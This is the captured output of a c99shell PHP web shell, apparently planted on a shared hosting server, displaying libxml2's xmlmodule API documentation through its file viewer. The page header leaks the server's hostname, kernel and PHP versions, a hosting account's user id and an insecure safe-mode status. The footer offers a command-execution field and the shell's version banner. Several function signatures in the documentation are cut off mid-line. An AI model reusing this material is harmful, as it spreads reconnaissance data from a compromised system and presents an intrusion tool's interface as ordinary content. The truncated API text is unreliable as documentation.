Software: Apache. PHP/7.3.33 uname -a: Linux acloudg.aryanict.com 4.18.0-513.9.1.lve.el8.x86_64 #1 SMP Mon Dec 4 15:01:22 UTC uid=1095(katebhospital) gid=1098(katebhospital) groups=1098(katebhospital) Safe-mode: OFF (not secure) /opt/alt/libxml2/usr/share/gtk-doc/html/libxml2/ drwxr-xr-x |
Viewing file: Select action/file-type:
xmlmodulexmlmodule - dynamic module loading basic API for dynamic module loading, used by libexslt added in 2.6.17 Author(s): Joel W. Reed Synopsistypedef struct _xmlModule xmlModule; typedef enum xmlModuleOption; typedef xmlModule * xmlModulePtr; int xmlModuleClose (xmlModulePtr module); int xmlModuleFree (xmlModulePtr module); xmlModulePtr xmlModuleOpen (const char * name, DescriptionDetailsStructure xmlModulestruct _xmlModule { The content of this structure is not made public by the API. } xmlModule; Enum xmlModuleOptionenum xmlModuleOption { XML_MODULE_LAZY = 1 /* lazy binding */ XML_MODULE_LOCAL = 2 /* local binding */ }; xmlModuleClose ()int xmlModuleClose (xmlModulePtr module) The close operations unload the associated module and free the data associated to the module.
xmlModuleFree ()int xmlModuleFree (xmlModulePtr module) The free operations free the data associated to the module but does not unload the associated shared library which may still be in use.
xmlModuleOpen ()xmlModulePtr xmlModuleOpen (const char * name, Opens a module/shared library given its name or path NOTE: that due to portability issues, behaviour can only be guaranteed with @name using ASCII. We cannot guarantee that an UTF-8 string would work, which is why name is a const char * and not a const xmlChar * . TODO: options are not yet implemented.
xmlModuleSymbol ()int xmlModuleSymbol (xmlModulePtr module, Lookup for a symbol address in the given module NOTE: that due to portability issues, behaviour can only be guaranteed with @name using ASCII. We cannot guarantee that an UTF-8 string would work, which is why name is a const char * and not a const xmlChar * .
|
:: Command execute :: | |
--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0931 ]-- |